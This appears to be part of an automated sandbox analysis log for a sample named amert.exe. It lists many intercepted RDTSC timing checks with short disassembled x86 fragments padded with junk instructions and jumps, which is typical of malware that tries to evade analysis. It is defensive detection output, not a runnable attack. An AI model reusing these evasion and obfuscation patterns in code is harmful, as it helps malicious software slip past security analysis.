Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 879595 second address: 8795E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F0D755569D8h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jnp 00007F0D755569DEh 0x00000015 pushad 0x00000016 popad 0x00000017 je 00007F0D755569D6h 0x0000001d jc 00007F0D755569DAh 0x00000023 push edx 0x00000024 pop edx 0x00000025 push ebx 0x00000026 pop ebx 0x00000027 jmp 00007F0D755569E5h 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F0D755569DCh 0x00000033 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 879A18 second address: 879A20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 879A20 second address: 879A24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 879A24 second address: 879A3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jp 00007F0D75558556h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007F0D75558556h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 879A3A second address: 879A3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 879A3E second address: 879A42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 879A42 second address: 879A48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 879A48 second address: 879A64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007F0D75558562h 0x00000010 jnl 00007F0D75558556h 0x00000016 jc 00007F0D75558556h 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 879D2F second address: 879D8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0D755569DFh 0x00000009 popad 0x0000000a push edi 0x0000000b jmp 00007F0D755569E6h 0x00000010 jmp 00007F0D755569E7h 0x00000015 pop edi 0x00000016 jmp 00007F0D755569E7h 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 879D8D second address: 879D93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 827285 second address: 827293 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0D755569DAh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 827293 second address: 82731B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b jmp 00007F0D75558567h 0x00000010 mov ebx, dword ptr [ebp+1247B351h] 0x00000016 xor dword ptr [ebp+122D28F8h], edi 0x0000001c add eax, ebx 0x0000001e mov dword ptr [ebp+122D295Eh], ebx 0x00000024 sub edx, 57973125h 0x0000002a nop 0x0000002b pushad 0x0000002c push edi 0x0000002d push eax 0x0000002e pop eax 0x0000002f pop edi 0x00000030 push ebx 0x00000031 push edi 0x00000032 pop edi 0x00000033 pop ebx 0x00000034 popad 0x00000035 push eax 0x00000036 jbe 00007F0D7555855Ah 0x0000003c nop 0x0000003d or ecx, 5FFEA9EBh 0x00000043 push 00000004h 0x00000045 push 00000000h 0x00000047 push edi 0x00000048 call 00007F0D75558558h 0x0000004d pop edi 0x0000004e mov dword ptr [esp+04h], edi 0x00000052 add dword ptr [esp+04h], 00000015h 0x0000005a inc edi 0x0000005b push edi 0x0000005c ret 0x0000005d pop edi 0x0000005e ret 0x0000005f push eax 0x00000060 push eax 0x00000061 push edx 0x00000062 push eax 0x00000063 push edx 0x00000064 jmp 00007F0D7555855Bh 0x00000069 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 82731B second address: 827325 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0D755569D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 879F01 second address: 879F3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0D75558565h 0x00000009 pop edi 0x0000000a push esi 0x0000000b jnp 00007F0D75558556h 0x00000011 jmp 00007F0D75558568h 0x00000016 pop esi 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 87A0AF second address: 87A0B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 87D858 second address: 87D85E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8810BB second address: 8810C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8811EF second address: 8811FD instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0D75558556h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8811FD second address: 881207 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0D755569D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8814BF second address: 8814C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 889CE1 second address: 889CFE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F0D755569DDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jne 00007F0D755569D6h 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 889CFE second address: 889D02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 889D02 second address: 889D17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jng 00007F0D755569DCh 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 889D17 second address: 889D31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0D75558565h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 887F61 second address: 887F69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8888FA second address: 8888FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8888FE second address: 888902 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 888902 second address: 888921 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0D75558569h 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 888BDC second address: 888BE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 888E55 second address: 888E5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 888E5B second address: 888E79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F0D755569E7h 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 888E79 second address: 888E8B instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0D7555855Ch 0x00000008 jno 00007F0D75558556h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 888E8B second address: 888E8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 888E8F second address: 888E95 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 889A1D second address: 889A29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F0D755569D6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8932C9 second address: 8932D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8932D3 second address: 8932F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jnp 00007F0D755569D8h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F0D755569E1h 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8932F9 second address: 8932FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 89245E second address: 892462 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 892753 second address: 89275E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F0D75558556h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 89275E second address: 89277C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D755569E9h 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 89277C second address: 892788 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 892788 second address: 89278E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 89278E second address: 892796 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 892796 second address: 89279B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8928EB second address: 8928F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edi 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8928F8 second address: 892917 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0D755569E2h 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 892D69 second address: 892D6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 892D6F second address: 892D8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0D755569E8h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 892EB9 second address: 892EBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 899D45 second address: 899D49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 89A2C1 second address: 89A2C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 89A43F second address: 89A44F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F0D755569DAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 89A44F second address: 89A46F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0D75558569h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 89A7A5 second address: 89A7D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D755569DBh 0x00000007 push eax 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jmp 00007F0D755569E5h 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 89AB77 second address: 89AB7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 89AB7F second address: 89AB93 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0D755569D6h 0x00000008 je 00007F0D755569D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 89AB93 second address: 89AB97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 89AB97 second address: 89ABB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F0D755569D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 je 00007F0D755569DAh 0x00000016 pushad 0x00000017 popad 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 89ABB1 second address: 89ABB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 89B2B4 second address: 89B2BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 89B2BB second address: 89B2D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 ja 00007F0D75558556h 0x0000000c popad 0x0000000d pop eax 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F0D7555855Bh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 89B2D9 second address: 89B2DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 89987E second address: 899894 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F0D7555855Dh 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 899894 second address: 8998CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D755569E6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0D755569E9h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8998CE second address: 8998D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8998D2 second address: 8998DA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8998DA second address: 8998E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8998E2 second address: 8998E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8998E6 second address: 8998F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8998F2 second address: 899906 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0D755569E0h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 899906 second address: 89990A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8A31CF second address: 8A31F9 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0D755569D6h 0x00000008 jmp 00007F0D755569E6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 jns 00007F0D755569D6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8B0344 second address: 8B0352 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007F0D75558556h 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8B3B05 second address: 8B3B09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8B3B09 second address: 8B3B0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8B34B0 second address: 8B34B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8B364D second address: 8B3654 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8B3654 second address: 8B3667 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0D755569DFh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8B3667 second address: 8B366B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8B366B second address: 8B3674 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8B5B53 second address: 8B5B59 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8B5843 second address: 8B5847 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8B5847 second address: 8B584D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8CCFB1 second address: 8CCFB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8CCFB5 second address: 8CCFD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F0D7555856Ah 0x0000000c jns 00007F0D75558556h 0x00000012 jmp 00007F0D7555855Eh 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8CD119 second address: 8CD11F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8CD268 second address: 8CD26E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8CD26E second address: 8CD272 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8CD272 second address: 8CD27E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0D75558556h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8CD27E second address: 8CD289 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F0D755569D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8CD64C second address: 8CD651 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8CD651 second address: 8CD657 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
